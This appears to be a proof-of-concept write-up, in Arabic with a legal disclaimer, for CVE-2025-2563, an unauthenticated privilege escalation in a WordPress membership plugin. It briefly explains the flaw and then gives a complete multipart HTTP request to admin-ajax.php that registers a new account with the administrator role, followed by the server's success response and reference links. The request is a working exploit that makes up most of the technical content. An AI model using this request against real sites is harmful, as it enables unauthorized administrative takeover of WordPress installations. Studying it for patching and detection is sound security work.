
CVE-2025-2563 PoC
المعلومات المقدمة في هذه الوثيقة عن الثغرة الأمنية (CVE) هي لأغراض تعليمية وإعلامية فقط. تستند التفاصيل المقدمة إلى مصادر متاحة للجمهور، وبحث وتحليل قام به المؤلف. المحتوى ليس مخصصًا للترويج أو التشجيع على أي أنشطة غير قانونية، بما في ذلك الاختراق أو الاستغلال أو الوصول غير المصرح به إلى الأنظمة.
لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام للمعلومات المقدمة. يُوصى بأن يطبق الأفراد والمؤسسات هذه المعرفة بمسؤولية ووفقًا للقوانين واللوائح المعمول بها. يُنصح القراء بشدة باختبار الثغرات فقط في بيئات خاضعة للرقابة وبعد الحصول على التصريح المناسب.
المؤلف والمساهمون في هذه الوثيقة لا يدعمون أو يؤيدون الأنشطة الضارة ويشجعون على الإفصاح المسؤول وممارسات الاختراق الأخلاقية.
تم اكتشاف ثغرة أمنية حرجة في إضافة "User Registration & Membership" الخاصة بووردبريس، وهي أداة شائعة لإنشاء مواقع العضوية ونماذج التسجيل. يحمل الخلل، المُعرَّف بـ CVE-2025-2563، درجة CVSS تبلغ 9.8، مما يشير إلى درجة شدته العالية.
إضافة User Registration & Membership لووردبريس معرضة لتصعيد الامتيازات في الإصدارات حتى 4.1.1 شاملة. ويعود ذلك إلى القيود غير الكافية على نوع الدور في دالة 'prepare_members_data()'. وهذا يتيح للمهاجمين غير المصادق عليهم إنشاء حسابات مستخدمين جديدة بدور 'administrator'، بشرط:
POST /wp-admin/admin-ajax.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: */*
Host: hackthebox.test
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------------------------189123966817005614765335
----------------------------189123966817005614765335
Content-Disposition: form-data; name="action"
user_registration_membership_register_member
----------------------------189123966817005614765335
Content-Disposition: form-data; name="security"
THE_NONCE_HERE
----------------------------189123966817005614765335
Content-Disposition: form-data; name="members_data"
{"membership":"MEMBERSHIP_ID","payment_method":"free","start_date":"2025-3-29","username":"REGISTERED_USERNAME","role":"administrator"}
----------------------------189123966817005614765335--
{
"success": true,
"data": {
"member_id": 24,
"transaction_id": "",
"message": "New member has been successfully created."
}
}
- https://plugins.trac.wordpress.org/browser/user-registration/tags/4.1.2/modules/membership/includes/Admin/Services/MembersService.php?rev=3259656#L106
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation
- https://securityonline.info/wordpress-plugin-cve-2025-2563-scores-9-8-threatens-thousands-of-membership-sites/